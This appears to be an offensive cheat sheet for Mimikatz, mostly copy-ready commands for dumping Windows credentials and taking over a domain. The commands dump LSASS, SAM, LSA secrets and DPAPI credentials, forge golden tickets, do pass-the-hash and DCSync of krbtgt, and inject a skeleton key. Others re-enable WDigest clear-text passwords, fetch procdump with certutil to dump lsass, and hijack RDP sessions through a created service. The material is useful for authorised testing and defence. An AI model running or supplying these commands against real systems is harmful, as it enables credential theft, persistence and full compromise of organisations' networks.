Mimikatz#
Mimikatz is the leading post-exploitation tool. The operator dumps plaintext passwords, NTLM hashes, PINs, and Kerberos tickets from memory and from on-disk hives.
Quick usage#
mimikatz > log
mimikatz > privilege::debug
sekurlsa#
mimikatz > sekurlsa::logonpasswords
mimikatz > sekurlsa::tickets /export
# pass-the-hash
mimikatz > sekurlsa::pth /user:Administrator /domain:winxp \
/ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
Kerberos#
mimikatz > kerberos::list /export
mimikatz > kerberos::ptt c:\chocolate.kirbi
# golden ticket
mimikatz > kerberos::golden /admin:administrator /domain:chocolate.local \
/sid:S-1-5-21-130452501-2365100805-3685010670 \
/krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
Crypto#
mimikatz > crypto::capi
mimikatz > crypto::cng
mimikatz > crypto::certificates /export
mimikatz > crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
mimikatz > crypto::keys /export
mimikatz > crypto::keys /machine /export
Vault and LSAdump#
mimikatz > vault::cred
mimikatz > vault::list
mimikatz > token::elevate
mimikatz > vault::cred
mimikatz > vault::list
mimikatz > lsadump::sam
mimikatz > lsadump::secrets
mimikatz > lsadump::cache
mimikatz > token::revert
mimikatz > lsadump::dcsync /user:domain\krbtgt /domain:lab.local
Command reference#
Command |
Description |
|---|---|
|
List or export certificates. |
|
Create golden / silver / trust tickets. |
|
List user TGT and TGS in memory. No special privileges (only
the current user). Similar to |
|
Pass the ticket. Inject a stolen or forged ticket. |
|
Ask a DC to synchronize an object (get password data without running code on the DC). |
|
Retrieve SAM / AD enterprise. Dumps all AD credentials from a
DC or |
|
Get the SysKey, decrypt SAM entries from registry or hive. Dumps local accounts. |
|
Dump trust keys (passwords) for associated trusts in the domain or forest. |
|
Add to SIDHistory on a user account. Moved to |
|
Inject a malicious Windows SSP to log locally authenticated credentials. |
|
Inject Skeleton Key into LSASS on a domain controller. Adds a master password while leaving normal passwords intact. |
|
Get debug rights (required for most Mimikatz commands). |
|
List Kerberos encryption keys. |
|
List Kerberos credentials for authenticated users (services and computer accounts included). |
|
Get the krbtgt service account password data. |
|
List available provider credentials (recently logged on users and computer accounts). |
|
Pass-the-hash and over-pass-the-hash. |
|
List available Kerberos tickets for all recently authenticated
users, including services and the local AD computer account.
Unlike |
|
List all tokens on the system. |
|
Impersonate a token (elevate to SYSTEM or find a domain admin token). |
|
Impersonate a token with Domain Admin credentials. |
Mimikatz, execute commands#
Single command.
PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
Multiple commands (console).
PS C:\temp\mimikatz> .\mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest
Extract passwords#
Microsoft disabled lsass clear-text storage from Win8.1 / 2012R2 on. The backport (KB2871997) is also available on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled.
mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest
Re-enable wdigest in Windows Server 2012+.
# HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest
# create a DWORD UseLogonCredential = 1
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest \
/v UseLogonCredential /t REG_DWORD /f /d 1
Activation conditions, Win7 / 2008R2 / 8 / 2012 / 8.1 / 2012R2 require lock and signout; Win10 requires signout for add and remove; Win2016 requires lock to add and reboot to remove.
Pass-the-hash#
sekurlsa::pth /user:<USER> /domain:<DOMAINFQDN> \
/aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:<USER> /domain:<DOMAINFQDN> \
/ntlm:cc36cf7a8514893efccd332446158b1a \
/aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
Mini dump#
Dump the lsass process.
# HTTP method
certutil -urlcache -split -f http://live.sysinternals.com/procdump.exe C:\Users\Public\procdump.exe
C:\Users\Public\procdump.exe -accepteula -ma lsass.exe lsass.dmp
# SMB method
net use Z: https://live.sysinternals.com
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
Then load into Mimikatz.
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords
Golden ticket#
.\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN \
/id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
# Example
.\mimikatz "kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN \
/id:9999 /sid:S-1-5-21-135380161-102191138-581311202 \
/krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 \
/endin:600 /renewmax:10080 /ptt" exit
Skeleton key#
privilege::debug
misc::skeleton
# map the share
net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
# login as someone
rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
RDP session takeover#
Run tscon.exe as SYSTEM to connect to any session without a
password.
privilege::debug
token::elevate
ts::remote /id:2
# session ID to hijack
query user
create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
net start sesshijack
Credential Manager and DPAPI#
# find credentials
dir C:\Users\<username>\AppData\Local\Microsoft\Credentials\*
# inspect with Mimikatz
$ mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0
# find master key
$ mimikatz !sekurlsa::dpapi
# use master key
$ mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 \
/masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed50630432739
40f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b